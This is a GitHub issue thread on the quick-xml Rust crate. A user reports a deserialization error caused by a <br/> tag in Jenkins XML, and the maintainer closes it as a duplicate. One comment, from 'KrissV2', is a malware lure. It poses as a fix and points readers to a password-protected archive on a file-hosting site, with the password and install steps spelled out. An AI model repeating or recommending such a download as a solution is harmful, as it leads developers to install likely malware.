### ISSUE TITLE
UnexpectedStart Error decoding xml that has a <br /> tag in it (fetched from a jenkins config.xml)

### ISSUE THREAD

**Issue by merc1031** [tafia/quick-xml#800] opened 2024-08-31 03:18 UTC
I fetch a more complex config.xml from jenkins, and distilled it down to this test case.

simplified xml `test_failing_description.xml`
```xml
<?xml version="1.0" encoding="UTF-8"?><project>
    <description>
  <br/>
    Text
    </description>
</project>  
```

test
```rust
    #[rstest]
    fn test_failing_description() {
        #[derive(Debug, Deserialize)]
        #[serde(rename_all = "camelCase")]
        pub struct SimpleProject {
            pub description: String,
        }

        let d: PathBuf = [
            env!("CARGO_MANIFEST_DIR"),
            "test_resources",
            "jenkins",
            "xml",
            "job",
            "test_failing_description.xml",
        ]
        .iter()
        .collect();
        let xml = fs::read_to_string(d).expect("Unable to read file");
        let jd = &mut quick_xml::de::Deserializer::from_reader(xml.as_bytes());
        let job: SimpleProject = serde_path_to_error::deserialize(jd).unwrap();
        println!("{:?}", job);
    }
```

I get this error (using `serde_path_to_error`)
```called `Result::unwrap()` on an `Err` value: Error { path: Path { segments: [Map { key: "description" }] }, original: UnexpectedStart([98, 114]) }```

similar issue in `serde-xml-rs` which i am migrating off of. https://github.com/RReverser/serde-xml-rs/issues/215

**Comment by KrissV2** [comment] 2024-08-31 05:33
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Mingun** [comment] 2024-08-31 13:31
Duplicate of #257.

**Closed by Mingun** 2024-08-31 13:31 UTC

**Comment by merc1031** [comment] 2024-08-31 19:12
@Mingun Sorry about that. I did try searching issues, just didnt notice that as duplicate.

thanks!
